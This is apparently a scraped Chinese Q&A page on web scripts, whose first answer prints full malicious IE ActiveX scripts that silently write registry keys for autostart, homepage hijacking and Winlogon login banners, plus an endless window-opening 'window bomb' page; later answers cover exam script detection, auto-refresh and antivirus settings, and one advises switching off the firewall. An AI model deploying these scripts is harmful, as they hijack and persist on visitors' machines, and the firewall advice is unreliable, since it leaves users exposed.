‘壹’ 网页恶意脚本检测的实现
恶意脚本, 就是点击人点击观看带恶意脚本的网站后,通过脚本实现删除注册表项或更改替换注册表项!或者运行某些程序!或者后台隐藏下载某些插件和病毒!. 都是可以实现的!
例如:
让电脑自动启动程序的代码,修改方法:找到相应键值并删除
<SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
文件://ActiveX/ initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://i50.yjpc.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>
自动设成主页代码
<SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://i50.126.com/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://i50.126.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>
IE视窗炸弹或者叫让IE不段循环的代码
<HTML>
<HEAD>
<TITLE>f\*\*k USA</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY onload="WindowBomb()">
<SCRIPT LANGUAGE="javascript">
function WindowBomb()
{
var iCounter = 0 // mmy counter
while (true)
{
window.open("http://www.webjx.com","CRASHING" + iCounter,"width=1,height=1,resizable=no")
iCounter++
}
}
</script>
</BODY>
</HTML>
进入WINDOWS 之前弹出来的对话框代码 到注册表找到 LegalNoticeCaption , LegalNoticeText 删除
<SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "测试");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "测试");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "测试");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "测试");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>
一般都是通过注册表 和快捷键的方式!触发,也有很多方法!
‘贰’ 雨课堂网页版线上监考可以检测到油猴脚本吗
可以。
考试用油猴插件自动答题会被检测到,因为后台的监考老师具有实时监测考生屏幕的权限。现在作答每一题的时长也会被记录,教师同样也可看到,意味着如果有人找枪手做题后,自己再抄上去,作答时间可能就会异常。
‘叁’ 怎样去掉网页脚本监控
关闭防火墙就行了.个人网络开不开防火墙没什么区别、因为没人会攻击你玩、 或者关闭瑞星网页监控也可以。
‘肆’ 如何写一个网页脚本,可自动监控网页上面的一个数据发生变化呢
那就自动刷新了
一可以网页的自动刷新功能
在网页的开头写代码
<meta http-equiv="refresh" content="3; url=http://www.85815.com">
refresh表示刷新
content=3表示间隔3秒刷新一次
url表示刷新后跳转的页面,如果是本页面,就写本页面的网址
再就是要用到ajax,这个我不太懂,所以就不说了
‘伍’ 瑞星杀毒软件网页监控里直接跳过网页中的脚本是什么意思
网页中常有些脚本(一种程序)带有病毒,容易造成系统瘫痪。
跳过网页中的脚本:就是不执行(运行)该脚本(程序)。